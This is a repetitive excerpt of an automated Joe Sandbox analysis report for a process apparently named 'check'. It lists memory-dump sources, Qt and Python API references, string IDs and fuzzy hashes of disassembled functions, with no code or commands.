                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?setCacheCache@@Limit@Pixmap
                                                                                                                                                                                                                • String ID: QPixmapCache$setCacheLimit$setCacheLimit(a0: int)
                                                                                                                                                                                                                • API String ID: 1598405161-294345867
                                                                                                                                                                                                                • Opcode ID: 23705bc5eb11a98b46a0ff239e2c582d992e3ecac04a7c90d0b4eed42fca5290
                                                                                                                                                                                                                • Instruction ID: 839998c5edbf005b93bb584d4e710bfd446139162cd0540389d959a0c9f7c138
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 23705bc5eb11a98b46a0ff239e2c582d992e3ecac04a7c90d0b4eed42fca5290
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E5F031B5A08A57C1EB249F25EC842A53774FB96748F9040B2DA4D13730CE7CD149C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Data@@Format@@ListText$?detach@?dispose@CharData@1@Data@1@@V0@@malloc
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2800744404-0
                                                                                                                                                                                                                • Opcode ID: 7a488099c114bc072305220f6a30f14b4f73cb17618688f240a13ebd0c663d90
                                                                                                                                                                                                                • Instruction ID: 4e0c005df3079de943f87d21913f44ac5787d1c4dac3f22809f4df8573358d95
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7a488099c114bc072305220f6a30f14b4f73cb17618688f240a13ebd0c663d90
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9A418FB2A09A45C6DB60CF28E44017DBB35FB84B95B69813ADB4D037A8DF3DD456C700
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • ?allocate@QArrayData@@SAPEAU1@_K00V?$QFlags@W4AllocationOption@QArrayData@@@@@Z.QT5CORE(?,?,?,?,00007FFB9A2E59D4), ref: 00007FFB9A363F19
                                                                                                                                                                                                                • ?allocate@QArrayData@@SAPEAU1@_K00V?$QFlags@W4AllocationOption@QArrayData@@@@@Z.QT5CORE(?,?,?,?,00007FFB9A2E59D4), ref: 00007FFB9A363F2F
                                                                                                                                                                                                                • ??0QTextCursor@@QEAA@AEBV0@@Z.QT5GUI(?,?,?,?,00007FFB9A2E59D4), ref: 00007FFB9A363F8F
                                                                                                                                                                                                                • ??0QFont@@QEAA@AEBV0@@Z.QT5GUI(?,?,?,?,00007FFB9A2E59D4), ref: 00007FFB9A363F9D
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Array$?allocate@AllocationData@@Data@@@@@Flags@Option@U1@_V0@@$Cursor@@Font@@Text
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3532179901-0
                                                                                                                                                                                                                • Opcode ID: 13fe5a7e28a757d776c8d8da4c2ec6fd6b8aa9d17f9242443392562305dff6be
                                                                                                                                                                                                                • Instruction ID: baa40f2de6f4e16dbf210ff4b111aac6589af743d962c7efd2b3e8b5b0ef7197
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 13fe5a7e28a757d776c8d8da4c2ec6fd6b8aa9d17f9242443392562305dff6be
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 11318AB2609A45C6DA20CF1AE84416DB774F788F94B66812ADF0D0B764DF39D496C700
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ClearDeallocErr_SubtypeTransform@@Type_
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3251824037-0
                                                                                                                                                                                                                • Opcode ID: 72e6fd2be1454d9ff51cc08bd7963bb99d4d81db785d1ced6e308e8de8d3bcc7
                                                                                                                                                                                                                • Instruction ID: 4d0faeea017fb148c57d703216177262b95bc32d7746fba7f2eed25e7fdf4ce5
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 72e6fd2be1454d9ff51cc08bd7963bb99d4d81db785d1ced6e308e8de8d3bcc7
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A53121A6A18E5681EBA59B2AF8841697374FB89FC4F185072EF4E17B64CF3CD481D700
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?parent@DeallocObject@@
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3324210772-0
                                                                                                                                                                                                                • Opcode ID: 9d2952b27c56fdc781e8c47865d86e1b0740986b3b580902586abc10ea04709f
                                                                                                                                                                                                                • Instruction ID: aeb46731027bc9b8577e44f5d548762280a6c0c56bf9de7f4cfec7e13202a015
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9d2952b27c56fdc781e8c47865d86e1b0740986b3b580902586abc10ea04709f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E0213AA1A0EB5681EA749F26E85416973A8BB4AFC4F0844B9DE4E27B64DF7CE0419700
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: DeallocTransform@@malloc
                                                                                                                                                                                                                • String ID: J9d
                                                                                                                                                                                                                • API String ID: 1381424447-3323460095
                                                                                                                                                                                                                • Opcode ID: 4eca4673d2780f729c0543226dba1fa40189bce998e36a264208062640644cab
                                                                                                                                                                                                                • Instruction ID: cfd7647b8d9cdd9ec9429426ac46893b5078753ef1a7995942731d5cafc02ecb
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4eca4673d2780f729c0543226dba1fa40189bce998e36a264208062640644cab
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9C31AEA2A0DF8582EB51CF29E84426D33A8FB99B84F259271DF4C17721EF39E5818700
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Bool_FromLong
                                                                                                                                                                                                                • String ID: 1J1
                                                                                                                                                                                                                • API String ID: 2610644205-2174808320
                                                                                                                                                                                                                • Opcode ID: 62177cc19be644c5318a970b121010dfc96895e7f3fc762ed8b04c97761c9ff5
                                                                                                                                                                                                                • Instruction ID: e9959c62a6e5baeeb78eb06c2e3f95c4cec8fbca9178b30f92398e2d0cc9d3d8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 62177cc19be644c5318a970b121010dfc96895e7f3fc762ed8b04c97761c9ff5
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7C216FB6B08B41C2FA218F26E44416973A8FB89BD4F148176EE4D13B64DF3CE486CB10
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Text$?createDocument@@Font@@Format@@@Object@Object@@V0@@
                                                                                                                                                                                                                • String ID: createObject
                                                                                                                                                                                                                • API String ID: 2532943642-299252263
                                                                                                                                                                                                                • Opcode ID: 52e45fd438f384f9dc00094440b7b9f97ab3eb64d2c4cf26df03f1e967ac2c2c
                                                                                                                                                                                                                • Instruction ID: d0360f099c4e8a32e099bc2bddca57de48cdc891fd0f61b817dd7d933b97b7c4
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 52e45fd438f384f9dc00094440b7b9f97ab3eb64d2c4cf26df03f1e967ac2c2c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 682141B6608B4182EB248F66F8442697764FB98BD8F144175EE8D13768DF3CE145C704
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: DeallocRegion@@V0@@malloc
                                                                                                                                                                                                                • String ID: J9J9
                                                                                                                                                                                                                • API String ID: 2721989731-2881787613
